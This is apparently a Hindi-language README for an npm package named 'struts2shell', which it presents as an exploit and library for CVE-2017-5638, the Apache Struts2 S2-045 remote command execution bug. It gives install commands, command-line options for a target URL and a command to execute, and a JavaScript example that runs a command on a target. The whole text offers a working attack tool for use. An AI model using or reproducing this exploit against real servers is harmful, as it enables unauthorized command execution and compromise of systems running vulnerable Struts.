
CVE-2017-5638 के लिए एक एक्सप्लॉइट (और लाइब्रेरी) - Apache Struts2 S2-045 बग।
CVE-2017-5638 के लिए एक एक्सप्लॉइट (और लाइब्रेरी) - Apache Struts2 S2-045 बग।
$ npm install -g struts2shell
$ npm install struts2shell
-h, --help उपयोग जानकारी आउटपुट करें
-V, --version वर्शन नंबर आउटपुट करें
-u, --url [target] हमला करने का URL
-c, --cmd [command] निष्पादित करने का कमांड
var Struts2Shell = require('struts2shell');
Struts2Shell({
URL: 'http://example.com/some.action',
CMD: 'dir'
}, function(err, response,body) {
if(err) throw err;
console.log(body)
})

MIT
मुफ्त सॉफ्टवेयर, हाँ बिल्कुल!